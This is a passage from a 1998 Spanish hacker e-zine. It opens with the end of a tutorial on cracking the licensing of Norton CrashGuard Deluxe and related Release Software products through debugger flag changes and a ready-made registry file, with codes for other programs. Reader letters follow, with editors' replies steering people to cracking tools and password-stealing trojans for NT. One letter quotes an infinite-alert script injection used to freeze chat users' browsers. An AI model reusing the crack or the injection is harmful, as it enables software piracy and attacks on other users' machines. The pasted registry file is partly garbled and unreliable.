nos es el camino.

Otra comparacion interesante se encuentra despues de la rutina de
entrada al bloque

cs:00406752 E859100000 call 004077B0 <- Bloque anterior
cs:00406757 66392D04254300 cmp [00432504], bp <- Comparacion Interesante
cs:0040675E 0F84F4010000 je 00406958
cs:00406764 BF34254300 mov edi, 00432534

Cuando nos encontremos sobre la direccion cs:0040675E cambiamos el
flag de cero que estara activada (Z) y la colocamos a desactivada (z).
Ahora el programa seguira en cs:00406764. Pulsemos F5 y veamos que ocurre.

Ha aparecido una ventana que nos dice que esperemos mientras nuestro
programa esta siendo preparado (Please wait while your software is being
prepared). Al fin, se "PREPARA EL SOFTWARE"

Nota: Si el proceso anterior se repite muchas veces conviene que
cerremos todos los programas que tengamos activo e incluso el mismo Norton
Crashguard que tengamos en la barra de tareas.

Una vez completado este proceso habremos comprado virtualmente el
Norton crashguard Deluxe.

Observaremos que han desaparecido los ficheros CGDeluxe.dl_ y
CGDeltky.dll y han aparecido dos archivos de licencia RSLICENS.txt y
LICENSE.xxxxxx (numeros de licencia) Este proceso realizado en tiempo real
con el Softice no trae ningun problema pero a la hora de hacer los parches
no encontraremos problemas con los checksum .Pero..TRANQUILOS QUE TODO
TIENE SOLUCION.

MODIFICANDO EL REGISTRO

Usaremos una herramienta muy util para los crackers el programa
Regmonitor (si no lo tienes consiguelo). Observamos unas variables que lee
el programa (no registrado) al principio y tenemos:

HKCR\ultxfile\Format\MSHAEZDC\write /* Esta nos suena */
HKCR\ultxfile\Format\MSHAEZDC\xlate
HKCR\ultxfile\Format\MSHAEZDC\open /* Esta nos suena*/

Bien, basta comparar los valores antes y despues de "preparar" el
software, para darse cuenta que la unica modificacion la realiza en open.
Cuando esta registrado su valor es:

HKEY_CLA°ES_ROOT \ultxfile\Format\MSHAEZDC\open
00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 10 00
08 08 00 00 10 00 00 00 - 00 00 00 00 00 00 00 00

Esta es la forma en que se comunica al resto de utilidades que la
compra ya ha tenido exito. Y YA ESTA, basta con introducir este valor en el
registro para que quede registrado el Norton CrashGuard Deluxe 3.0

MSHAEZDC corresponde al programa en cuestion a comprar. Usando el
regmonitor vemos que clave busca el programa a desproteger y anotamos el
codigo (MSHAEZDC).

Esta tactica se ha probado con exito con las siguientes aplicaciones
protegidas por la compañia Release Software Corporation : Norton utilities,
Norton Uninstaller, Norton Antivirus, Xing MPEG Encoder,

Creando un archivo de registro ya tenemos hecho un crack no
destructivo ya que no modifica ningun ejecutable.

----------------------------------- Cortar por aqui --------------------------
REGEDIT4
; (c) ESTADO+PORCINO 1998
; Modificacion de registro para Norton Crash Guard Deluxe
; Mr.Red & otras hierbas
;
[HKEY_CLA°ES_ROOT\ultxfile\Format\MSHAEZDC]
"open"=hex:00,00,00,00,00,0
ffb
0,00,00,00,00,00,00,00,00,10,00,08,08,00,00,10,00
,00,00,00,00,00,00,00,00,00,00

----------------------------------- Cortar por aqui --------------------------

Para los demas programas que usan esta proteccion tenemos:

Xing MPEG Encoder codigo -> MSHVEMAV
Norton Utilities codigo -> MSHVEM0E
Norton Unisntaller codigo -> MSHW2EHL

Bueno ha sido largo pero ha merecido la pena.


MORALEJA: Si quieres poner una puerta, procura que no sea de papel.

Es el colmo de la incompetencia. Confias la venta de tu producto a un
empresa que proporciona una proteccion ridicula que no vende tu producto si
no que practicamente lo regala. Por que no invertir la millonada que
Symantec habra pagado a Release Software Corporation encontrar a unos
buenos programadores en ensamblador que hicieran una proteccion decente.
Ademas, esta compañaa protege y vende productos de mas empresas a parte de
Symantec. Basta pasarse por su web http://www.releasesoft.com y comprobar
lo orgullosos que estan de sus clientes. Realmente, no creo que esta
compañia dure mucho.

La importancia de este articulo radica en que se ha conseguido
solventar con exito la proteccion de una casa de Software dedicada a
proteger y vender. Quedan a nuestros pies cientos de programas, con una
proteccion de papel, gracias a la incompetencia de una avariciosa compañia.
Mejor seria que diera los programas gratis, y de dejara de hacer el
ridiculo.

Esperamos vuestras opiniones, sugerencias y ensayos en
estadoporcino@hotmail.com Recordad bebed de la fuente, buscad a +ORC en la
red.

Mr_PinK & WKT ( WHISKEY KON TEKILA )
http://wkt.home.ml.org
http://wkt.mypage.org

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
| Un poco de cultura: Libros |
\----------------------------------/


Bien, en primer lugar, esta va a ser, digamos, la nueva seccion del
e-zine. Aqui, a partir de ahora y en adelante a los siguientes e-zines,
comentaremos distintos titulos de libros relacionados con el tema, y por
supuesto donde podreis encontrarlos y su precio (si es q se sabe :o).

Dicho esto, vamos a empezar:

- Cyberpunk, outlaws and hackers on the computer frontier. Katie Hafner and
John Markoff. Simon & Shuster, New York 1995.

Libro de lectura obligada, engloba todos los casos mas conocidos sobre el
underground, desde Kevin Mitnick hasta el Hacker de Hannover. De momento
este libro solo lo he encontrado en ingles :o(, pero bueno, podeis buscarlo
en espaÒol tambien, mirar por su ISBN :0-684-81862-0. Unas 1.500 a 2.000 pts

- Hackers: Heroes of the computer revolution. Steven Levy. Dell Books, New
York, 1994.

Otro de los grandes libros sobre el tema. Steven Levy es un autor expe-
rimentado sobre el tema de los ordenadores, este es su tercer libro. Tambi-
en en ingles, pero como ya dije antes, puedes buscarlo por su ISBN :0-385-
31210-5. 1.500 pelas.

- Hacker Crackdown, The: Law and Disorder on the Electronic Frontier. Bruce
Sterling. Bantman Books, 1993.

Uno de los libros mas famosos sobre el mundo de los hackers. En este
libro, el autor examina el pasado, presente y futuro del underground, desde
sus principios, pasando por MoD y LoD hasta, de nuevo, Mitnick. Otro mas en
ingles. Su ISBN: 0-553-56370-X.

- Huevo del Cuco, El. Clifford Stoll, 1990.

Que decir de uno de los libros mas famosos sobre el underground. Aqui tie-
nes toda la historia del conocido Hacker de Hannover, toda una autentica
historia. ISBN: 0-671-72688-9. Sobre las 2.000 pelas.

- Maximun Security: A Hacker's Guide to protecting your internet site and
network. Anonymous, SAMS Net, Indianapolis, 1997.

Este es uno de los libros "tecnicos" mas famosos y utiles q conozco. En es-
te libro encontraras todo lo necesario para aprender sobre seguridad, desde
el usuario mas principiante hasta el administrador de un sistema, aqui tie-
nes absolutamente todas las respuestas a tus preguntas. Libro escrito por
un hacker ya experimentado. El libro incluye el ultimo manifiesto escrito
por The Mentor, y una de las mejores citas sobre el autor que he leido hasta
ahora. La cita dice asi: "El autor de este libro vive felizmente en el sur
de California, con un Sun SPARCStation, un IBM RS-6000, dos Pentium, varios
MicroVax, y su mujer"
:o), bueno, dejemonos de coñas, aqui esta su ISBN:
1-57521-268-4. Altamente recomendado :o). Un poco carillo, entre 7.500 y
10.000 ptas. depende el sitio donde lo compres.

- Masters of Deception: The gang that ruled cyberspace. Michelle Stalla &
Josua Quitter, Harper Collins, 1995.

Libro imprescindible si quieres conocer la autentica historia sobre los MoD.
Este libro se basa en los pasos seguidos por Phiber Optik (aka Mark Abene) y
sobre sus andanzas por Legion of Doom, 2600 y la fundacion de Masters of
Deception. Muy Bueno y entretenido. ISBN: 0-060-92694-5. 1.500 ptas.

- Mundo Digital, Un. Nicholas Negroponte. RandomHouse, 1995.

Un libro muy entretenido, escrito por un gran autor y gran estudioso de los
ordenadores y a lo que de tecnologia se refiere. Este libro lo hay en espa-
ñol, lo que no se es la editorial fijo, asin que vuelve a buscar por su ISBN
0-679-43919-6. Sobre 2.000 pelas.

- Takedown.Tsutomu Shimomura, John Markoff. Hyperion, 1996.

Otro de los grandes libros sobre los grandes del Hack, en este caso se
cuenta como se capturo a Kevin Mitnick. Este libro esta escrito por el autor
de su captura, muy entretenido. ISBN: 0-786-88913-6. Sobre las 2.000 pelas.

- UNIX in a Nutshell: A Desktop Quick Reference for Solaris V and 2.0.
Daniel Gilly. O'Reilly & A°ociates, 1992.

Trannnnnnnnquis, aunque parezca que el librito ta un poco anticuado, no pasa
na, acaba de salir la segunda edicion actualizada para el SVR4. Uno de los
libros mas famosos para empezar a conocer este sistema operativo. 2.000 ptas.
ISBN: 1-585-92001-5

- UNIX Unleashed. Sams Development Team. SAMS Publishing, Indianapolis 1994.

Acojonante, es la unica palabra que se me ocurre para describir este pedazo
de libro. Aqui encontraras todo lo que necesites saber del SVR4. Escrito por
gurus del UNIX. ISBN: 0-672-30402-3. Sobre unas 7.500 a 8.000 ptas.


Bueno, de momento esto es todo lo que os puedo ofrecer de libros, pero no os
preocupeis, el proximo e-zine, mas :o).

mac_crack@usa.net

<---------------------------------------------------------------------------->
€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€€
<---------------------------------------------------------------------------->

⁄-----------------ø
< EL LECTOR OPINA >
¿-----------------Ÿ

Otra vez ya estamos con vuestra seccion, pero os pedimos que penseis
claramente lo que nos escribiis, ya que sige habiendo mucho desaprensivo
que solo quiere entrar en computadoras ajenas y similares, esto es una
tonteria, por lo que no hace falta que escribais }:-) Al igual que tampoco
hace falta que escribas un mail solicitando que os demos clases de hack,
menuda tonteria. Okis?

Por otro lado esta seccion esta mejorando, ya que por fin los lectores
se empiezan a contestar entre ellos, y esto es lo que precisamente
pretendiamos con esta seccion y nos alegra mucho ;-) y ya basta de rollos
y que comienze el mail de nuestros fantasticos lectores.

<---------------------------------------------------------------------------->

From: PoP <popup@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: novato...... en IRC soy ^PoP^ :)

Hace un mes, mas o menos, me pasaron vuestra web, y me parecio
bueniiiiiiisima. Estoy leyendo todos los txt, incluidos los e-zines(que es
muy buena..... sera pq es la primera ke leo :), y ademas es baratita...
jeje, pero de muchas cosas nomentero...

Es por esto ke os "maileo" para sugerir ke pongais en el e-zine o en
kualkier otro sitio(kreeme ke lo buskare) un diccionario en el ke vengan
palabras teknikas ya ke eso ayudaria mucho.
Estoy komo loko por hacer todo eso de lo ke hablais en el e-zine(mi novia
dice ke kiero mas a mi PC ke a ella :) ) pero veo ke es totalmente
necesario tener al menos un linux, controlar el lenguaje C y sobre todo
saber komo se kompila. Bueno el kaso es ke me veo inkapaz de acceder a
internet por otro S.O. ke no sea el Win95 (o NT ke es lo mismo a mi
parecer), ya ke intente instalar linux (la version s.u.S.e 5.0 y no me dio
muy buen resultad( a parte de no entender ni papa) y por eso os pido
ayuda...
Me gustaria (si no es mucho pedir) ke me sugirierais ke version de linux
instalar(tengo la suse 5.1 y la red hat 5.0, aunke kompraria otra si hace
falta) para poder iniciarme (y algun tipo de informacion sobre los comandos
de linux). Ya he preguntado por ahi y me ha dicho ke pruebe kon la
SlackWare... . Pero sobre todo un libro para aprender lenguaje C y saber
kompilar, para pardillos komo yo ke empiezan del zero_absoluto( en lo ke a
lenguaje C se refiere).
Enga, no os doy mas la tabarra.... solo felicitaros por la pag y por el
e-zine (sois mu wuenos :) ) y seguid asi! Accedeis a ayudar y es dificil
enkontrar ayuda sobre hack para los novatos komo yo ke kieren llegar ha ser
komo vusotros... y olvidar el w95 de una puñetera vez!
Espero vuestro mail y......... Muxxxxxxxas Gracias!

Atentamente.... Jose Antonio Lopez (Murcia)

<------>

[ Thx, Hombre lo referente a las versiones linux eso depende un poco de
tus gustos, por ejemplo:

- Red Hat or SuSe = Facil de instalar y mantener.
- Slackware = Muy buena.
- Debian = Enfocada a los programadores.

Nuestro consejo es que empiezes con RH 5.0 o SuSe que son faciles y
despues pruebes con Slackware o Debian. Como dices bien en tu mail es
aconsejable que pilles algun libro sobre Linux y C. ]

<---------------------------------------------------------------------------->

Date: Fri, 24 Apr 1998 19:52:41 -0700 (PDT)
From: hardbody@xxxxxxxxxxxxxx
Subject: help

Señor Conde Vampiro

Por favor, ayudeme, yo lo que mas quiero en la vida es ser hacker, me
fascina la idea de entrar a otro computador sin que este se de cuenta,
estoy en segundo semestre de Ingenieria de Sistemas y tengo 17 años.

Por favor, envieme su respuesta lo mas pronto posible.

Atte Zeus

<------>

[ Pues con esa filosofia que tienes no llegaras muy lejos que digamos,
ya que el hacking no consiste en entrar en computadoras ajenas y
que el dueño no se de cuenta. Haver si lees este ezine con mas
claridad. ]

<---------------------------------------------------------------------------->

Date: Sun, 26 Apr 1998 17:04:13 GMT
From: "Ferran Fontcuberta ( Vs )" <versus@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Pos vaya ;-)

Pues... una sugerencia, podrias comprimir la revista en zip o gz o... ya
que okupa menos y se tarda menos en bajar (aunke tengan el mismo tamaño)

Tanxs.

Vs
versus@xxxxxxxxxxxxxx
com

<------>

[ No me digas!!, pero como ya hemos dicho en alguna ocasion no queremos
comprimirla ya que asi es llegar y leer. ]

<---------------------------------------------------------------------------->

Date: Thu, 30 Apr 1998 12:24:38 GMT
From: "Francisco Rodriguez Casal (Pac\4s)" <pacs@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: Copiar diskettes

Hola:

Os queria pedir ayuda.

Quiero copiar un diskette que esta protegido contra copia. Se trata de
un programa reciente que incluye un diskette llave (ellos le llaman
TOKEN) creo que la proteccion consiste en un error de sector
intencionado en la pista 28 cara 1 el cual no es reproducido en el disco
destino pot los copiones.

He intentado copiar el diskette con varios copiones y no lo he
conseguido. Tampoco controlo mucho del tema.

Por supuesto, no pretendo piratear ningun programa, lo que intento es
hacer una copia de seguridad de dicho disquete ya que si se daña pierdo
la licencia. ;-)

Gracias.

Un saludo.

__________________________________________________________
Universidad de La Coruña
Servicios Informaticos de Gestion

Francisco Rodriguez Casal
Email: pacs@xxxxxxxxxxxxxx
__________________________________________________________

<------>

[ Un buen copion deberia ser capaz de copiarlo, por lo que deberias seguir
buscando alguno que satisfaga tus necesidades. Ademas siempre puedes
aplicar "coding rulez" o sea que como crees saber donde esta la proteccion
la puedes intentar anular. Pasate por la seccion de crack, para pillar
tools para este trabajo. ]

<---------------------------------------------------------------------------->

Date: Sat, 02 May 1998 10:27:38 GMT
From: <ardarj@xxxxxxxxxxxxxx>
Subject: CONSULTA

HOLA J.J.F. SOY FEAR, SUPONGO QUE NO SABEIS QUIEN SOY (SEGURO QUE NO).
BUENO, OS PODRIA DECIR QUE SOY UN USUARIO DE INTERNET A QUIEN LE GUSTARIA
APRENDER A SER UN HACKER, NO SE SI ESO ES POSIBLE ASI COMO YO LO ESTOY
PLANTEANDO, PERO ESPERO QUE PODAIS AYUDARME, DANDOME CONSEJOS Y
EXPLICANDOME LAS COSAS QUE DEBO DE HACER, ME REFIERO A QUE VOSOTROS
SEREAIS MIS PROFESORES Y YO VUESTRO FIEL ALUMNO. SEGURO QUE RECIBIREIS
CIENTOS DE MAIL'S COMO ESTE, PERO YO OS JURO SI ME ENSA—AIS, VAIS A PODER
ESTAR ORGULLOSOS DE MI.
DE TODAS FORMAS, ME GUSTARIA FELICITAROS POR LA GRAN PAGINA QUE TENEIS,
SEGURO QUE SIRVE DE AYUDA A MUCHAS PERSONAS Y POR ULTIMO ME GUSTARIA QUE
AUNQUE PASAEIS DE MI ME ACLARARAIS UNA DUDA:

- EN VUESTRA PAGINA HAY UN APARTADO QUE EXPLICA COMO BLOQUEAR UN ORDENADOR
A TRAVES DE UN CHAT. YO LO INTENTE HACER DE ESTA FORMA:
1.- ME CONECE… AL BUSCADOR OLE.
2.- LE DI AL APARTADO DE CHAT'S.
3.- ESCOGI EL APARTADO "DIVERSION"
4.- ESCOGI EN CANAL "AMOR"
5.- UNA VEZ DENTRO, HABRO EL CANAL PRIVADO DE OTRO USUARIO.
6.- HABLE UN POCO CON EL Y CUANDO PAS” DE MI, ESCRIBI LO QUE
VOSOTROS DECIAIS QUE HABIA QUE ESCRIBIR O SEA ESTO

<script language=javascript>for(i=1;i<2;) { alert("lo siento tenia que
probarlo con alguien"
)}</script>

7.- LE DI AL INTRO Y.... NO PAS” ABSOLUTAMENTE NADA, TODO LO QUE
HABIA ESCRITO APARECI” EN EL CANAL PRIVADO, Y EL TIO ME
PREGUNTO QUE PORQUE HABIA PUESTO ESO.

BUENO ME GUSTARIA QUE SI PODEIS Y QUEREIS ME DIJERAIS QUE ES LO QUE HE
HECHO MAL, O LO QUE NO HE HECHO. GRACIAS.

EMAIL= ardarj@xxxxxxxxxxxxxx

<------>

[ Como ya hemos dicho, no damos clases privadas ni nada por el estilo.
Nuestro consejo que es estudies mucho todo lo que puedas. Parece que hay
alguna web que enseñan a escribirnos solicitando clases porque todos
escribiis lo mismo!!!!.
Si hubieras leido el txt con mas cuidado, verias que pone que no siempre
funciona debido al CGI de los Web Chat, por eso antes de ejecutar el
script, escribe '<' para saber si funciona o no. Lo mas aconsejable es
volverse a leer la guia. ]

<---------------------------------------------------------------------------->

From: <quasar@xxxxxxxxxxxxxx>
To: mack_crack@usa.net
Subject: [JAU....]

Hola loco....

La verdad es ke iba a encriptarlo con pgp pero para decir esta tonteria
paso....

Solamente era para decirte ke tu g¸eb es una de las ke hay ke ir
viniendo cada x tiempo para ver las novedades y tal y pascual....por lo
ke en mi opinion, una mas, deberia ser muy dinamica y ligera y asi
daaria gusto en venir...bla bla bla y mas bla....

Resumiendo mucho ke no tengo ganas de enrollarme: el contenido de la
g¸eb...muy OK
pero macho......DESCARGALA DE JAVA KE SE HACE ETERNO!!!....

A lo mejor un poco directo pero claro.....ok?...

por cierto, a ver si podeis re-editar el articulo de Nobody sobre el
netstat y nbtstat ke la peña me pregunta siempre lo mismo y asi, en vez
de enrollarme, le paso el articulo ese...os lo digo a vosotros porke
creo ke teneis contacto....ok?

y ya os enviare algo un dia ke tenga un minimo de ganas ......

cuidaros y no cerreis los dos ojos al dormir.....;)

contestad en:

quasarr@xxxxxxxxxxxxxx

ostias no he utilizao el remailer...p°s...da igual...lo dicho....

QuasaR .......... progre°ing

re°ing

<------>

[ Hi

Pues si, nuestras webs son de las q cada POCO tiempo se actualizan con mas
ficheros, links y si, tb java. Ya se q se hace eterno, pero si te has leido
la segunda pantalla de nuestra web pone entrada CON JAVA y entrada SIN JAVA,
o sea q en lo referente a tu consejo de descargarla de java, mmmm, paso, ya
he tenido q hacer dos entradas, coje la q mas te convenga ;-). En lo
refererente al articulo de Nobody, ya le mandaremos un mail a ver q dice.
Byezz ]

<---------------------------------------------------------------------------->

From: "Dany" <kawa.saki@xxxxxxxxxxxxxx>
Subject: Win NT

Hola,

Estoy buscando Caballos de Troya.
Tanto el codigo ( Para Vbasic o Pascal ) como los programas ya hechos. Es
para Win NT, para tomar las claves. Alguna Sugerencia???

Dany,

CodeBracker en el IRC Hispano

<------>

[ Pues de eso alguna cosa hay, lo mejor que puedes hacer es visitar alguna
web sobre Hack NT y ya pillaras tools. Para Vbasic si que hemos visto
pero en pacal nop. Pillate el winsock caballo de troya. ]

<---------------------------------------------------------------------------->

Date: Wed, 06 May 1998 09:25:01 GMT
From: "Sanye" <sanye@xxxxxxxxxxxxxx>
Subject: hackers JJf Hackers

me gustaria recibir informacion sobre los programas y pasos que tendria
que seguir para acceder a sistemas remotos como los ordenadores de mi
amigos por ejemplo, o servidores de red de empresas o cosas asin Te pido
ayuda ya que seguro que tu sabes cuales son los programas y tambien los
pasos a seguir.

ea3ckx@xxxxxxxxxxxxxx

<------>

[ hhuummmm, creo que para eso esta este ezine o sea que lee. ]

<---------------------------------------------------------------------------->

Date: Mon, 11 May 1998 10:47:55 GMT
From: chipiona <chipiona@xxxxxxxxxxxxxx>
To: "'silicio@xxxxxxxxxxxxxx"
Cc: "'zen@xxxxxxxxxxxxxx"
Subject: SOLICITO_AYUDA, POR_FAVOR

Imploro a quien me pueda ayudar, que me eche un cble en esto.
Ya se que como indicais en vuestras paginas la mayoria de vosotros, esto es
ilegal y solo lo mostrais a efectos educativos, y bajo la responsabilidad
del que lo acepte. YO ACEPTO ESA RESPONSABILIDAD.
Os explicare el problema. Tengo una serie de programas demo de gestion de
clinica veterinaria. Todos estan limitados de alguna forma, la mayoria de
llos en la cantidad de clientes que les puedo meter (maximo de 25 clientes),
y otro que esta limitado por la fecha (1/4/98, que ya tengo controlada
mediante el DATE CRACKER), pero tambien esta limitada la base de datos
indicandome cuando craqueo la fecha que no puede aceptar el registro porque
es superior a los seis meses de evaluacion.
®Hay alguna forma o programa que me podais indicar para eliminar estas
limitaciones?. Conque me funcione uno de los programas me avio.

Mi nombre es Jose Javier y mi direccion de correo es como veis
CHIPIONA@xxxxxxxxxxxxxx y no os asusteis del nombre porque es el correo
de la oficina donde curro.

GRACIAS A TODO°

<------>

[ Hombre, para empezar son programas demos y esta muy mal por tu parte
que los uses para obtener beneficio economico, como estas haciendo.
Lo mejor que puedes hacer para crackearlos, es buscar algun crack
especifico para el programa en cuestion. Pasa por nuestra seccion de
crack para pillar alguna tool. ]

<---------------------------------------------------------------------------->

Date: Thu, 07 May 1998 05:13:14 GMT
From: Marco Demonte <mdemonte@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: mmmm.. pena

Sr. Vampiro ;-)

Se que el tiempo que ocupara en leer esto es tiemo perdido pero no hay
otra manera para aprender.....

Como se comienza a crackear.. algun documento para empezar o algo
asi.. Ya que estoy interesado en eso por que tengo una lista ...

Le comento que soy de Mexico y hace un par de años estuve estudiando
mucho respecto al phreaking , aqui en Mexico rompiamos con 2600hz y
utilizaba protocolo ccitt r2 por lada 800 nacional, era una maravilla,
tambien con 2600hz para lada 800 internacional y tambein funcionaba....
Si te interesa podria pasarte algunos tips que en otros paises podrian
funionar como la intervencion de llamadas en sistemas ccirr r2..

Tambien se algo de cululares....

Mil gracias por tu tiempo

Marco

<------>

[ A que esperas!!!! envia los trucos al ezine ;-) y ya sabes escribe algun
articulo de phreak. Para crackear hay varios documentos de como comenzar.
Pasate por nuestro web ya que alguno hay disponible. ]

<---------------------------------------------------------------------------->

  Date:  Tue, 12 May 1998 17:40:37 GMT 
From: Anonimo <prophet@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: {CyBoRg}, SHG

Hola a todos me parece cojonuda vuestra revista, escribo este mail
para contestar un mail que lei sobre una que decia que querias cosas
de NT, y que el GETADMIN no funciona remotamente. Bueno lo primero, el
getadmin funciona remotamente y lo he probado y va, porque no pruebas
hacer lo siguiente desde MS.DOS:

GETADMIN \\ip\nombre usuario

No se habra ocurrido utilizar el getadmin con el usuario invitado porque
no va con ese usuario.

Cosas de hack de NT, nunca se te ha ocurrido explorar los recursos
compartidos de NT que trae ocultos,, ah pero eso no lo sabiais, :))))).
Hay una buena utilidad por ahi que se llama NAT que os ayudara para el
NBTSTAT famoso, ya que le podreis poner un dicionario y lo pasa. Que mas
utilizar el l0pth, va genial si no tiene instalado el SP3. Hay muchas
cosillas.

Bueno otro asunto comentaba de hacer taeardrop, land, etc en windows,
pues gente es posible hacerlo, hay un sitio que tiene el programilla.

*****Censurad la url si quereis ******
www.aggre°or.net

Bueno gente me despido y o quiero dar mas la tabarra. Hasta otra. Por
cierto cuando metamos los 30 megas de nuestra web, pondremos un link a
vuestro zine,

Ad10, bye

++++++++++++++++
{CyBoRg}
SHG.....
++++++++++++++++

<------>

[ Por fin, los propios lectores se contestan entre si :)))
Okis, ya nos pasaras el url del grupo y nosotros tb os pondremos un
link.
Thx's por los cumplidos y nos gusta que otros grupos nos saluden, ya
sabeis que podeis escribir algun arti, estaremos encantados de
publicarlo. Saludos de - J.J.F. / HACKERS TEAM - ]

<---------------------------------------------------------------------------->

From: "Fco. de Angel Fernandez-Pacheco" <fdeangel@xxxxxxxxxxxxxx>
Subject: Re: E-Zine

Hola!!!
Lo primero es felcitasros por el E-Zine que esta muy guapo, luego otra
cosa es si puedo colaborar en traducciones de textos en vuestra pagina.
Sludos.

DataCrack

<------>

[ Pues ya sabes, traduce lo que quieras y lo envias al buzon y lo pondremos
en el ezine :), la gente nos pide traducciones de articulos de pkreak,
o sea que ya te hemos dado trabajillo.
Esta genial que querais colaborar, cuantos mas, mejor para todos. ]

<---------------------------------------------------------------------------->

Date: Thu, 14 May 1998 03:00:02 GMT
From: Ayala <ayala@xxxxxxxxxxxxxx>
To: conde_vampiro@usa.net
Subject: (sin asunto)

hola, estoy buscando a un maestro, alguien que pueda iniciarme
en la entrada a sistemas informaticos. Si puedes ayudarme, hazmelo
saber, gracias.

<------>

[ Ya estamos como siempre!!, que no ayudamos a la gente para que entre
en los sistemas ajenos y tampoco damos clases privadas, okis ? ]

<---------------------------------------------------------------------------->

Date: Wed, 20 May 1998 02:37:32 GMT
From: "Arturo Villal\sn Villa" <avillalo@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Problemas con algunas de sus secciones

Tengo problemas al intentar bajar algunos de los archivos de su pagina
estos son:
Seccisn HACK Novell (no se puede obtener ninguna utileria)
Utilidades de Encripcisn (no se puede obtener ninguna utileria)
Utilidades Network-Hacking (no se puede obtener ninguna utileria)

? Que es lo que esta pasando en sus servidores o cual es la razsn de
este problema ?

? Tienen una direccisn FTP para obtener mas rapidamente estas utilerias
asm como los archivos de Virus Informaticos, de ser asm, podrman darme
la direccisn para tomarlos ?

Saludos

<------>

[ Es normal que siempre haya algun enlace que no este disponible, ya que el
web es muy dinamico, ademas que algunas de esas secciones que mencionas
hay un MENSAJE QUE PONE QUE DE MOMENTO ESTA OFF-LINE , pero en fin ...
Las razones son muy variadas, por desgracia, pero procuramos estar siempre
con lo mejor y mas actualizado ;-) Sobre virus tienes la seccion de
virus que seguro te gustara. ]

<---------------------------------------------------------------------------->

Date: Wed, 20 May 1998 07:34:44 GMT
From: "David Gallego Laredo" <dgall@xxxxxxxxxxxxxx>
Subject: listado unfrateful.java

EN PRIMER LUGAR ME GUSTARIA FELICITAROS POR VUESTRO E-ZINE, ES EL MEJOR QUE
HE LEIDO HASTA EL MOMENTO EN CASTELLANO, SOY UN AFICIONADO AL HACK Y
DESEARIA COMENTAROS UN PROBLEMA QUE ME HA SURGIDO CON UNO DE LOS LISTADOS
EN JAVA PUBLICADOS EN VUESTRO CUARTO E-ZINE. EN CONCRETO SE TRATA DEL
"UNGRATEFUL.JAVA" EN EL CUAL MEDA UN ERROR AL COMPILARLO CON EL VISUAL J++
1.1.

EL ERROR ES EN LA INSTRUCCION:
ErrorMe°age err = new ErrorMe°age();

ME DICE QUE NO HE DEFINIDO LA CLASE ErrorMe°age.
NO SE NADA DE JAVA DE MOMENTO, Y ESPERO ME PODAIS HECHAR UNA MANO PARA QUE
ESTE PROGRAMA FUNCIONE Y PODER PROBARLO Y ESPERIMENTAR UN POCO CON EL.

ESPERO NOTICIAS VUESTRAS, GRACIAS Y HASTA OTRA.

<------>

[ Pues definela ;-) por ejemplo, pero lo mejor es que pilles algun libro o
busques algun curso de Java por la Red, que te pueda ayudar.
Thx por los cumplidos :) ]

<---------------------------------------------------------------------------->

Date: Sat, 23 May 1998 23:43:47 GMT
From: Edgardo Mayer <horizonte@xxxxxxxxxxxxxx>
Subject: INFO

Podrmas darme direcciones de E-mail de colegas-hackers argentinos.
Busco sean argentinos por la parte de la telefonma se
refiere(phreakers).

Gracias y ixitos

Edgardo

<------>

[ Pues nosotros no conocemos ningun phreaker o hacker argentino, pero
si alguien lo es, que nos envie un mail y os pondremos en contacto,
okis ? ;-) ]

<---------------------------------------------------------------------------->

From: "raul diaz" <rul_diaz@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Saludos...!!!

Antes que nada los felicito por su pagina, son muy interesantes los
temas que ahi describen...

f e l i c i d a d e s . . . ! ! !

Les escribe un fiel aficionado a los hackers, pero apenas soy un bebe en
esto, por eso les escribo para pedirles que hechen una mano, y me
enseñen a hacer esto...

Donde yo trabajo, hay una gran red de tipo T1, espero me puedan mandar
algo de informacion para hacer algo por aca....

Tambien quisiera (si no es mucha molestia) que me enseÒaran desde lo
basico, como les digo soy un fiel aficionado y me fascina esto...

Como ustedes dicen: La informacion viaja y es libre.... (claro sin dañar
a nadie).

Bueno, espero me contesten.....

atte: Un ser al que le gusta la superacion.... Slash. ;-)

<------>

[ Thx :) pero como siempre nuestro consejo que es leas este ezine con
mucha atencion y experimentes por tu cuenta. ]

<---------------------------------------------------------------------------->

Date: Tue, 26 May 1998 22:18:36 GMT
From: cubikice@xxxxxxxxxxxxxx
To: jjf_team@usa.net
Subject: Holas!! estoy vivo!! :-)

Hola!!
Queria responderos al mail que me enviasteis hace + o - una semana
en la que me deciais que ibais a publicar mi articulo y nada, que queria
daros las gracias, estoy preparando otro articulo, este de mi cosecha
aunque no se si os lo llegare a enviar, lo veo un tanto verde
El caso es que ahora mi placa base se la he tenido que dejar a mi novia :-)
total que estoy tirando de 486 y no puedo enchufar mis HD's de siempre
asi que os envio esto desde la web y con el LYNX, joder!
(y es que tampoco tengo CD-ROM), total que voy con un Linux descafeinado
y totalmente desconfigurado, menos mal que aun asi voy haciendo cosillas.
Bueno, no os pego mas la paliza, vais alguna vez por el IRC? me gustaria
chtear un rato con alguno de vosotros algun dia.
Pues nada, eso es todo.
Un saludo!! cubikice@xxxxxxxxxxxxxx

<------>

[ Okis, y estamos esperando ese arti :) siempre puede ser util para alguien
y eso es lo que pretendemos en este ezine.
Sobre lo de IRC, pues no, ya que no nos interesa mucho. Para estar
en contacto con nosotros pues E-mail :) ]

<---------------------------------------------------------------------------->

Date: Fri, 29 May 1998 20:51:46 GMT
From: RAFAEL TREJO OLVERA <a75878@xxxxxxxxxxxxxx>
To: jjf_team@usa.net
Subject: Zic

Hola quisiera que me ayudaran para poder ser un hacker.
Mi e-mail es Zic97@xxxxxxxxxxxxxx
De cualquier manera mandemen informacion sobre hackers o programas.
y les pido la direccion de un chat de hackers.

<------>

[ Pues como ya hemos repetido tantas veces lee este ezine y nosotros no
